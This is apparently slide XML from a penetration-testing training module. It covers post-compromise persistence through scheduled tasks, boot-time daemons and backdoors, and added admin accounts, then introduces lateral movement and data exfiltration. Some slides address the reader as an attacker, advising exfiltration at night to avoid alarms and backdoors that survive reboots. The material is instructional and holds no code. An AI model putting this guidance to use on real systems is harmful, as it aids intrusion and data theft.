            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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When a Windows user creates a new task, the system typically doesn’t require the user to authenticate with an administrator account.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4167872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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scheduled Jobs and Tasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="9005406"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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can access the scheduled tasks of a Windows system by navigating to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Start -&gt; Administrative Tools -&gt; Task Scheduler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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Alternatively, you can press the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>key+R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to open the Run dialog box and then type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>taskschd.msc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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Scheduled tasks can also be used to steal data over time without raising alarms. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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In Windows, Task Scheduler can be leveraged to schedule jobs that may use a significant amount of CPU resources and network bandwidth. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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This is helpful when huge files are to be compressed and transferred over a network (especially if you set them to execute at night or during weekends, when no users will be on the victim’s system).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491046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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Custom Daemons, Processes, and Additional Backdoors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="887601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400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Much as with scheduled tasks, you can create your own custom daemons (services) and processes on a victim system, as well as additional backdoors. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Whenever possible, a backdoor must survive reboots to maintain persistence on the victim’s system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can ensure this by creating daemons that are automatically started at bootup. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>These daemons can persist on the system to either further compromise other systems (lateral movement) or exfiltrate data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1384877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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>New Users</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="8962274" cy="1611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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>After you compromise a system, if you obtain administrator (root) access to the system, you can create additional accounts. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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These accounts can be used to connect to and interact with the victim system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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Just as it is a best practice when configuring user accounts under normal circumstances, you (as an attacker) should create those alternate accounts with complex passwords.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004745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057399"/>
            <a:ext cx="8218817" cy="2753873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8.2 Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="460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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1653445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10783" y="0"/>
            <a:ext cx="9144000" cy="285103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="935966"/>
            <a:ext cx="8591907" cy="2808976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lateral movement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (also referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pivoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) is a post-exploitation technique that can be performed using many different methods. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The main goal of lateral movement is to move from one device to another to avoid detection, steal sensitive data, and maintain access to the devices to exfiltrate the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sensitive data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, which is data whose theft would have a severe impact to an organization.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Such data typically should not be broadly shared internally or externally. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Access to sensitive data should be limited and tightly controlled. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data exfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is the act of deliberately moving sensitive data from inside an organization to outside an organization’s perimeter without permission. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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dirty="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name="Slide 3">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358140"/>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What to Expect in this Module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
